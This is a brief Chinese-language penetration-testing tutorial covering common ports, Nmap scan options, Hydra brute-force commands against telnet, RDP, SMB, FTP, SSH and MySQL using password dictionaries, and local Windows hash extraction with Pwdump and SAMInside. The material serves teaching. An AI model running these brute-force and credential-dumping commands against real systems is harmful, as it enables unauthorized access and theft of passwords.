扫描
0. 前言
手工与工具相结合
主机探测与端口扫描
主机测探是指确定目标主机是否存活。
端口扫描就是寻找在线主机所开放的端口,并且在端口上所运行的服务。甚至可以进一步确定目标主机操作系统类型和更详细的信息。
1. 常见端口号
| 21 |
FTP |
443 |
HTTPS |
| 22 |
SSH |
1433 |
SQL Server |
| 23 |
Telnet |
1521 |
Oracle |
| 25 |
SMTP |
3306 |
MySQL |
| 80 |
HTTP |
3389 |
RDP |
2. Nmap
2.1 重要参数
| -sP |
ping 扫描 |
| -p |
指定端口范围 |
| -sV |
服务版本探测 |
| -O(大写) |
启用操作系统探测 |
| -A |
全面扫描 |
| -oN |
保存txt |
2.2 常用远程爆破命令
1 2 3 4 5 6
| Nmap -sP 192.168.133.1/24 #扫描10.1.1.0整个网段 Nmap -p 21,23-25,3389 192.168.133.133 Nmap -p 192.168.133.133 -sV #扫描21,23的服务版本 Nmap -A 192.168.133.133 #全面扫描 Nmap -O 192.168.133.133 #扫描目标系统版本 Namp -p 21,23 192.168.133.133 -oN e:\result.txt #将查询结果保存到文档里
|
3. Hydra(九头蛇)
3.1 常用远程爆破命令
1 2 3 4 5 6 7 8 9 10 11 12
| Hydra -l a -p 123 192.168.133.133 telnet Hydra -l a -P e:\pass.txt 192.168.133.133 telnet Hydra -l a -P e:\pass.txt 192.168.133.133 rdp Hydra -l a -P e:\pass.txt 192.168.133.133 smb Hydra -l a -P e:\pass.txt 192.168.133.133 ftp Hydra -l a -P e:\pass.txt 192.168.133.133 ssh Hydra -l a -P e:\pass.txt 192.168.133.133 mysql
Hydra -L e:\user.txt -P e:\pass.txt 192.168.133.133 telnet
#-l是指定用户名,-L是用户文件;-p是指定密码,-P是密码文件 (这里也相当于跑字典)
|
4. 本地爆破
以下的程序都要以管理员的权限打开dos命令进行运行程序
getpass从本地内存中提取密码
Pwdump 提取sam中的HASH值,然后手工将hash值存储到hash.txt中
使用saminside软件进行hash暴力破解(前提saminside的字典库dic里有密码)